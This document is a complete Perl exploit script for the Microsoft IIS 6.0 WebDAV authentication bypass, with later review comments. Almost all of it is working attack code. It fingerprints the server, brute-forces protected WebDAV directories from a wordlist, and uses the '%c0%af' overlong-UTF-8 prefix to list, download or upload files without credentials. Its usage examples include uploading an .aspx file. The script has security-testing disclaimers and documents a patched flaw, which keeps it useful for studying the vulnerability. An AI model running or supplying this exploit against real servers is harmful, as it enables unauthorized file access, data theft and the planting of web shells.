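#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# *   FOR SECURITY TESTING ONLY!    *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#   v1.1  added brute-force directory function        2009-05-29
#   v1.0  download / upload and list directory        2009-05-24
#
# How it works: every WebDAV request line carries the target path prefixed
# with "%c0%af", an overlong UTF-8 encoding of "/".  That prefix is the whole
# bypass this script relies on - presumably IIS 6.0 evaluated authorization on
# the raw URL and only afterwards canonicalised it, so a password-protected
# directory could be listed (PROPFIND), read (GET) or written (PUT) without
# credentials.  Microsoft fixed this in 2009; confirm the exact advisory / CVE
# before citing it.  Use only against systems you are authorized to test.
#
# Usage:
#   IIS6_webdav.pl -target HOST -port PORT -method p|g|l (-xpath DIR | -bpath WORDLIST) [-file NAME]
#     -target   host to probe                               eg.: 192.168.1.1
#     -port     web server port                             eg.: 80
#     -method   p = PUT, g = GET, l = LIST (PROPFIND)       eg.: g
#     -xpath    WebDAV path on the server                   eg.: webdav
#     -bpath    wordlist of candidate WebDAV paths          eg.: dirdic.txt
#     -file     file to upload / download (needed for p, g) eg.: test.aspx
#   Getopt::Long accepts any unique prefix, so -t -p -m -x -b -f work as well.
# Examples:
#   put a file:              IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#   get a file:              IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#   list dir:                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#   brute force + list dir:  IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#   brute force + get file:  IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
#
# Review notes on this revision: the published listing had lost every
# backslash (\n, \r, \t, \", \$, \&), restored here; "$method != 'l'" was a
# numeric comparison that numifies both sides to 0 and never fired;
# "$SIG{ALRM} = &ermm" called ermm() at once and stored its return value, so
# no timeout handler was ever installed; the hand-packed sockaddr_in
# ("SnA4x8") is not portable, IO::Socket::INET replaces it.

use strict;
use warnings;
use IO::Socket;        # provides IO::Socket::INET
use Getopt::Long;
use threads;           # present in the original; nothing below is threaded
use threads::shared;

# ---- command-line state ------------------------------------------------------
my $target;        # host being probed
my $port;          # web server port
my $method;        # p / g / l as typed on the command line
my $xpath;         # WebDAV path on the server (may come from brute force)
my $bpath;         # wordlist of candidate WebDAV paths
my $file;          # file to upload (PUT) / download (GET)
my $httpmethod;    # PUT / GET / PROPFIND, derived from $method
my $Host_Header;   # headers (plus XML body for PROPFIND) after the request line

my $TIMEOUT = 10;  # seconds allowed for connect and for reading the response

GetOptions(
    "target=s" => \$target,
    "port=i"   => \$port,
    "method=s" => \$method,
    "xpath=s"  => \$xpath,
    "bpath=s"  => \$bpath,
    "file=s"   => \$file,
    "help|?"   => sub { hello(); exit(0); },
) or do { print "Try $0 -help or -? for more information.\n"; exit(1); };

my $error = '';
$error .= "Error: You must specify a target host\n"             unless $target;
$error .= "Error: You must specify a target port\n"             unless $port;
$error .= "Error: You must specify a put,get or list method\n"  unless $method;
$error .= "Error: You must specify a webdav path\n"             unless $xpath || $bpath;
# Only the list method works without a file name.
$error .= "Error: You must specify a upload or download file name\n"
    if !$file && (!defined $method || $method ne 'l');
if ($error) {
    print "Try $0 -help or -? for more information.\n$error\n";
    exit(1);
}

hello();

my %http_method_for = (p => 'PUT', g => 'GET', l => 'PROPFIND');
$httpmethod = $http_method_for{$method};
unless ($httpmethod) {
    print "$method Method not accept !!!\n";
    exit(1);
}

# ---- 1. does the server speak WebDAV and allow our method? -------------------
webdavtest($target, $port);

# ---- 2. optionally brute-force the protected WebDAV path ---------------------
if ($bpath) {
    $xpath = webdavbf($target, $port, $bpath);
}
print "-" x 60 . "\n";

# ---- 3. build headers (and body) for the chosen method -----------------------
my $content = '';   # PUT body
if ($httpmethod eq 'PUT') {
    -f $file or die "Could not open file $file: not a regular file\n";
    open(my $in, '<', $file) or die "Could not open file $file: $!\n";
    binmode($in);
    $content = do { local $/; <$in> };
    close($in);
    $content = '' unless defined $content;          # zero-byte file
    my $filesize = length $content;
    print "$file size is $filesize bytes\n";
    # "Translate: f" is the WebDAV hint for IIS to hand over the file itself
    # rather than run it through a script map (verify against IIS docs).
    # The blank line that ends the headers is appended with the body below.
    $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
}
elsif ($httpmethod eq 'GET') {
    $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
}
elsif ($httpmethod eq 'PROPFIND') {
    $Host_Header = propfind_headers($target);
}

my $label = $httpmethod eq 'PROPFIND' ? 'path list' : $file;
print "-" x 60 . "\n$httpmethod $label , Please wait ...\n" . "-" x 60 . "\n";

# ---- 4. send the request -----------------------------------------------------
# "%c0%af" (overlong UTF-8 "/") in front of the protected path is the bypass.
my $uri     = $httpmethod eq 'PROPFIND' ? "/%c0%af$xpath/" : "/%c0%af$xpath/$file";
my $request = "$httpmethod $uri HTTP/1.0\r\n$Host_Header";
$request   .= "\r\n$content" if $httpmethod eq 'PUT';   # end of headers + body

my @results = sendraw2($request, $target, $port, $TIMEOUT);
if ($#results < 1) { die "${TIMEOUT}s timeout to $target on port $port\n"; }

# Only a 2xx status line counts as success; 3xx/4xx/5xx all report FAILED.
my $ok = ($results[0] =~ m{^HTTP/1\.[01] 2\d\d }) ? 1 : 0;
print "-" x 60 . "\n";

if (!$ok) {
    print "$httpmethod $label from [$target:$port/$xpath] FAILED!!!\r\n";
}
elsif ($httpmethod eq 'PUT') {
    print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
}
elsif ($httpmethod eq 'GET') {
    # The body starts after the first empty line.  (The original searched for
    # "Accept-Ranges: bytes" and assumed it was the last header.)
    my $body_start;
    for my $i (0 .. $#results) {
        if ($results[$i] =~ /^\r?\n$/) { $body_start = $i + 1; last; }
    }
    unless (defined $body_start) {
        warn "No header/body separator in response; writing an empty file\n";
        $body_start = @results;
    }
    # Saved under the name given on the command line, in the current directory.
    open(my $out, '>', $file) or die "Could not write to file: $!\n";
    binmode($out);
    print {$out} @results[$body_start .. $#results];
    close($out) or die "Could not write to file: $!\n";
    print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
}
elsif ($httpmethod eq 'PROPFIND') {
    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
    # Pull every <x:href>...</x:href> out of the 207 Multi-Status body whatever
    # namespace prefix the server uses (the original split on "<a:href>").
    my $body = join '', @results;
    while ($body =~ m{<(?:\w+:)?href>([^<]*)</(?:\w+:)?href>}gi) {
        print "$1\n";
    }
}
print "-" x 60 . "\n";
exit(0);

# ---- helpers -----------------------------------------------------------------

# PROPFIND headers for $host, followed by the original script's propfind XML.
# NOTE(review): Content-Length is 0, so a compliant server ignores the XML that
# follows the blank line and handles an empty-body PROPFIND; the bytes are kept
# exactly as the original sent them because the 401/207 checks were tuned on
# that request.
sub propfind_headers {
    my ($host) = @_;
    my $xml = '<?xml version="1.0" encoding="utf-8"?>'
            . '<D:propfind xmlns:D="DAV:">'
            . '<D:prop xmlns:R="http://apache.org/dav/props/">'
            . '<R:bigbox/><R:author/><R:DingALing/><R:Random/>'
            . '</D:prop></D:propfind>';
    return "Host: $host\r\nConnection: close\r\n"
         . "Content-Type: text/xml; charset=\"utf-8\"\r\n"
         . "Content-Length: 0\r\n\r\n"
         . $xml;
}

# Send one raw request and return the response as a list of lines (the first
# is the status line).
#   $pstr     - complete request bytes, including the blank line / body
#   $realip   - host to connect to
#   $realport - TCP port
#   $timeout  - seconds for connect and for the whole read
# Returns an empty list when the connection fails or the read times out, so
# callers can treat "fewer than two lines" as failure.
sub sendraw2 {
    my ($pstr, $realip, $realport, $timeout) = @_;

    my $sock = IO::Socket::INET->new(
        PeerAddr => $realip,
        PeerPort => $realport,
        Proto    => 'tcp',
        Timeout  => $timeout,
    );
    unless ($sock) {
        print STDOUT "Connect to $realip:$realport failed: $@\n";
        return ();
    }
    binmode($sock);
    $sock->autoflush(1);

    # die() from the ALRM handler unwinds out of a blocked read; the eval
    # catches it so the caller sees an empty list instead of a crash.
    my @in;
    my $done = eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm($timeout);
        print {$sock} $pstr;
        while (my $line = <$sock>) {
            push @in, $line;
        }
        alarm(0);
        1;
    };
    alarm(0);
    close($sock);
    unless ($done) {
        die $@ unless $@ eq "timeout\n";
        print STDOUT "Timeout\n";
        return ();
    }
    return @in;
}

# Probe with OPTIONS / and exit(0) unless the server identifies as IIS (when it
# says at all), advertises DAV:, and lists $httpmethod in Public: (when present).
sub webdavtest {
    my ($testip, $testport) = @_;
    print "-" x 60 . "\n";
    print "Testing WebDAV methods [$testip $testport]\n";
    print "-" x 60 . "\n";
    my @reply = sendraw2("OPTIONS / HTTP/1.0\r\n\r\n", $testip, $testport, $TIMEOUT);
    if ($#reply < 1) { die "${TIMEOUT}s timeout to $testip on port $testport\n"; }

    # Gather the headers first so the checks do not depend on their order
    # (the original only examined Public: if DAV: had already been seen).
    my %header;
    for my $line (@reply) {
        last if $line =~ /^\r?\n$/;                           # end of headers
        next unless $line =~ /^([\w-]+):[ \t]*(.*?)[ \t\r\n]*$/;
        $header{ lc $1 } = $2;
    }

    if (defined $header{server}) {
        (my $server = $header{server}) =~ s/ //g;
        print "$testip : Server type is : $server\n";
        if ($server !~ /Microsoft-IIS/i) {
            print "$testip : Not a Microsoft IIS Server\n";
            exit(0);
        }
    }
    unless (defined $header{dav}) {
        print "$testip : WebDAV disable\n";
        exit(0);
    }
    if (defined $header{public}) {
        (my $public = $header{public}) =~ s/ //g;
        print "$testip : Method type is : $public\n";
        if ($public !~ /\Q$httpmethod\E/i) {
            print "$testip : Not allow $httpmethod on this WebDAV Server\n";
            exit(0);
        }
    }
    return;
}

# Try each line of the wordlist as "PROPFIND /<word>/" WITHOUT the bypass
# prefix.  A 401 means the directory exists and is protected - the case the
# bypass is for - so that word is returned.  Exits the program when the list
# is exhausted.
#   $bfip, $bfport - target
#   $bfpath        - wordlist file, one candidate path per line
sub webdavbf {
    my ($bfip, $bfport, $bfpath) = @_;
    print "-" x 60 . "\n";
    print "Try to brute forceing WebDAV path ...\n";
    print "-" x 60 . "\n";
    open(my $dict, '<', $bfpath) or die "Could not open file $bfpath: $!\n";
    my $headers = propfind_headers($bfip);
    while (my $candidate = <$dict>) {
        chomp $candidate;
        $candidate =~ s/\r$//;          # tolerate DOS line endings
        next if $candidate eq '';
        my @reply = sendraw2("PROPFIND /$candidate/ HTTP/1.0\r\n$headers", $bfip, $bfport, $TIMEOUT);
        if ($#reply < 1) { die "${TIMEOUT}s timeout to $bfip on port $bfport\n"; }
        print "[$candidate]...$reply[0]";
        # An unprotected directory would answer 207 Multi-Status instead.
        if ($reply[0] =~ m{^HTTP/1\.[01] 401 }) {
            print "Find out path on [$candidate]\n";
            close($dict);
            return $candidate;
        }
    }
    close($dict);
    print "Sorry... We can not find any more path... :(\n";
    exit(0);
}

# Print the banner and short usage text.
sub hello {
    my @banner = (
        '###################################################',
        '#   MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.1   #',
        '# **************** !!! WARNING !!! ************** #',
        '# **** FOR PRIVATE AND EDUCATIONAL USE ONLY! **** #',
        '# *********************************************** #',
        '#   Written by csgcsg 2009-05-29                  #',
        '###################################################',
    );
    print "\n";
    print "\t $_\n" for @banner;
    print "\n\t $0 -target -port -method (-xpath | -bpath) [-file]\n";
    print "\n\t -target\t\t\t eg.: 192.168.1.1\n";
    print "\t -port\t\t\t\t eg.: 80\n";
    print "\t -method\t\t\t eg.: g\n";
    print "\t (p:PUT, g:GET, l:LIST)\n";
    print "\t -xpath | -bpath\t\t eg.: webdav | dirdic.txt\n";
    print "\t -file\t\t\t\t eg.: test.aspx\n\n";
    print "\t Usage eg.: \n\t $0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
    return;
}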